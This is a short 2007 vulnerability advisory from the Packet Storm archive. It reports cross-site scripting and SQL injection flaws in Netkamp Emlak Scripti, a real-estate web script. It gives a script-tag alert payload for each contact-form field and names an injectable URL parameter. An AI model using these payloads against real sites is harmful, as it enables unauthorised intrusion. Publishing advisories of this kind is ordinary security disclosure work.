netkamp-sql.txt

2007-09-30T00:00:00
ID PACKETSTORM:59691
Type packetstorm
Reporter GeFORC3
Modified 2007-09-30T00:00:00

Description

                                        
`Netkamp Emlak Scripti XSS & SQL Injection Vulnerabilities  
  
#Software: Netkamp Emlak Scripti  
#download: not free (350 YTL), sale: http://www.netkamp.com/net_emlak.asp  
#demo: http://netemlak.netkamp.com/  
#Found By: GeFORC3 ( G3 )  
  
  
#Exploit & example :  
  
-----------------------------------------------------------------------  
#XSS:  
  
http://www.site.com/script_path/iletisim.asp  
  
Enter the XSS code in the script's text boxes.  
  
Example:  
  
İletişim Formu (contact form)  
  
Adınız (first name): "><script>alert("G3");</script>  
Soyadınız (last name): "><script>alert("G3");</script>  
E-Mail: "><script>alert("G3");</script>  
Konu (subject): "><script>alert("G3");</script>  
Mesajınız (message): "><script>alert("G3");</script>  
  
Press the "gönder" (send) button.  
  
This XSS works on the contact page of the "Netkamp Emlak Scripti" script.  
-----------------------------------------------------------------------  
#SQL Injection:  
  
http://www.site.com/script_path/detay.asp?ilan_id=[SQL]  
  
  
-----------------------------------------------------  
WwW.GeFORC3.ORG | WwW.HeykirBlog.Org | WwW.NetKaBus.CoM  
`